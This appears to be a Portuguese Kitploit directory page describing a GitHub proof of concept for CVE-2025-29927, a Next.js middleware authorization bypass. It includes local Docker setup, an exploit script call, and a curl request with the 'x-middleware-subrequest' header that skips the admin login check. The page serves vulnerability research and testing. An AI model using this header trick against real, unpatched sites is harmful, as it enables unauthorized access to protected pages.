Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
nextjs-middleware-exploit — Pesquisa sobre vulnerabilidade de middleware do Next.js (CVE-2025-29927) permitindo bypass de autorização e potenciais explorações. | Kitploit
Ferramentas/GitHubGitHub/l1uk/nextjs-middleware-exploit
Análise de VulnerabilidadesExploraçãoExploração de Aplicações WebTestes de PenetraçãoAutenticaçãoAprendizado e Educação
GitHubl1uk/nextjs-middleware-exploit

nextjs-middleware-exploit

Pesquisa sobre vulnerabilidade de middleware do Next.js (CVE-2025-29927) permitindo bypass de autorização e potenciais explorações.

Ver Repositório
1há 1 anoAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

Pesquisa sobre Vulnerabilidade no Middleware do Next.js (CVE-2025-29927)

Este repositório demonstra uma vulnerabilidade crítica no middleware do Next.js (CVE-2025-29927), que afeta as versões 11.1.4 até 15.1.7. Esta vulnerabilidade permite desvio de autorização, desvio de CSP e potenciais ataques DoS através de envenenamento de cache. O problema tem origem na forma como o cabeçalho x-middleware-subrequest é tratado, permitindo que atacantes contornem os mecanismos de proteção do middleware.

Esta prova de conceito é específica para a vulnerabilidade na v12

Uso

Configuração do ambiente

Configure o ambiente vulnerável usando Docker e os arquivos deste repositório executando:

root@kitploit:~
git clone https://github.com/l1uk/nextjs-middleware-exploit.git
cd nextjs-middleware-exploit
docker build -t my-next-app .
docker run -p 3000:3000 my-next-app

Exploração

Este repositório possui o script já criado para testar a exploração da vulnerabilidade. Para testá-lo, execute:

exploit.sh
root@kitploit:~
chmod +x exploit.sh
./exploit.sh

Além disso, você pode testar a exploração da vulnerabilidade tentando o seguinte

  1. Solicite a página de admin sem autenticação. Você deve obter um redirecionamento para a página de login.
root@kitploit:~
curl -i http://localhost:3000/admin
  1. Solicite a página sem autenticação, mas usando o cabeçalho x-middleware-subrequest. Você deve conseguir contornar a página de autenticação.
root@kitploit:~
curl -i -H "x-middleware-subrequest: pages/_middleware" http://localhost:3000/admin

Aviso de Segurança

  • CVE-2025-29927: Link do Aviso de Segurança
Baixar ferramenta